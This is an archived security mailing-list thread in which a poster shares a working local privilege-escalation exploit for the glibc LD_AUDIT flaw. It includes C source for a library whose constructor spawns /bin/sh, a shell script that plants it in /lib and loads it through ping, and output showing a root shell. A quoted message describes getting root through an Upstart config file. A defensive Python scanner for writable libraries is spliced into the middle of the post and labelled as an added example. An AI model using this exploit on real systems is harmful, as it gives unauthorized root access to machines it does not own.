PaulDotCom mailing list archives

Re: Privilege escalation with GNU ld dlopen


From: Xavier Garcia <xavi.garcia () gmail com>
Date: Tue, 9 Nov 2010 10:43:25 +0100

Hi guys,


I finally found an easier way to gain root privileges, without
rebooting the computer.


The vulnerability can be used to upload a custom library to the
server and then execute a root shell.

The library is really simple (libevil.so)

----

#include <errno.h>
#include <unistd.h>

/* Constructor: runs as soon as the dynamic linker maps the library. */
static void
__attribute__ ((constructor))
install (void)
{
  execl("/bin/sh", "/bin/sh", (char *) 0);
}

----

user@host:~/$ cat ./run.sh

umask 0
gcc -c -fPIC evil.c -o evil.o
gcc -shared -Wl,-soname,libevil.so.1 -o libevil.so evil.o
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/lib/libevil.so" ping
cat ./libevil.so > /lib/libevil.so
LD_AUDIT="libevil.so" ping


user@host:~/$ sh run.sh
ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit
interface: undefined symbol: la_version; ignored.
Usage: ping [-LRUbdfnqrvVaAD] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface]
            [-M pmtudisc-hint] [-m mark] [-S sndbuf]
            [-T tstamp-options] [-Q tos] [hop1 ...] destination
# whoami
root
#


I hope it is helpful.

Regards,

Xavier Garcia
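A defender-side check, added here as an example and not part of Xavier's post: it walks the dynamic linker's default library directories and reports any shared object that is group- or world-writable or not owned by root, which is precisely the artifact the `umask 0` plus `PCPROFILE_OUTPUT` step leaves behind in /lib. The directory list and the `demo_scan` sample tree are assumptions constructed for the example.

```python
import os
import stat
import tempfile

# Directories glibc's dynamic linker searches by default (assumption: a
# typical layout; add the entries from /etc/ld.so.conf.d for your system).
DEFAULT_LIB_DIRS = ["/lib", "/usr/lib", "/lib64", "/usr/lib64"]


def unsafe_reason(path, owner_uid=0):
    """Return why `path` is a shared object a lower-privileged user could have
    written or could still change, or None if ownership and mode are sane."""
    st = os.lstat(path)
    if not stat.S_ISREG(st.st_mode):
        return None                          # symlinks and specials: skip
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return "group/world writable (mode %o)" % stat.S_IMODE(st.st_mode)
    if st.st_uid != owner_uid:
        return "not owned by uid %d (owner uid %d)" % (owner_uid, st.st_uid)
    return None


def scan_library_dirs(dirs=DEFAULT_LIB_DIRS, owner_uid=0):
    """Walk each library directory; return (path, reason) for every .so that
    fails the ownership/mode check. Suitable for a periodic integrity job."""
    findings = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for root, _subdirs, files in os.walk(d):
            for name in files:
                if ".so" not in name:
                    continue
                full = os.path.join(root, name)
                reason = unsafe_reason(full, owner_uid)
                if reason:
                    findings.append((full, reason))
    return findings


def demo_scan():
    """Constructed sample, not a real system: a temp 'lib' directory with one
    world-writable .so (what umask 0 + PCPROFILE_OUTPUT leaves in /lib) and
    one correctly permissioned library. Returns the scan findings."""
    d = tempfile.mkdtemp(prefix="libscan-")
    for name, mode in (("libevil.so", 0o666), ("libsafe.so.1", 0o644)):
        p = os.path.join(d, name)
        with open(p, "wb") as f:
            f.write(b"\x7fELF")              # header bytes only, not loadable
        os.chmod(p, mode)
    return scan_library_dirs([d], owner_uid=os.getuid())
```

On a real host call `scan_library_dirs()` with the defaults as root; any hit in a system library directory deserves a package-manager verification of that file.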




On Fri, Nov 05, 2010 at 12:11:32PM +0100, Xavier Garcia wrote:
Hi guys,

I am trying to find some ways to gain root access by using the
vulnerability described in the advisory

http://marc.info/?l=full-disclosure&m=128776663124692&w=2

published by Tavis Ormandy.

The advisory states that Cron can be used to escalate privileges,
but Cron does not accept files that are writable by the group or
others, returning the error BAD FILE MODE.

I have been looking for alternative ways to gain root access, but
there are not many places where it is possible.

I have found that Upstart (http://en.wikipedia.org/wiki/Upstart)
does not check the permissions and happily reads the
configuration files every time it restarts. This means that we can
create a configuration file that will instruct Upstart to
drop a root shell :)


The downside is that we have to be patient and wait until the
computer is rebooted, or use some social engineering.


You can find more details at

http://www.shellguardians.com/2010/11/privilege-escalation-with-upstart-and.html


I hope this finding is interesting or useful for the list.

Regards,

Xavier Garcia
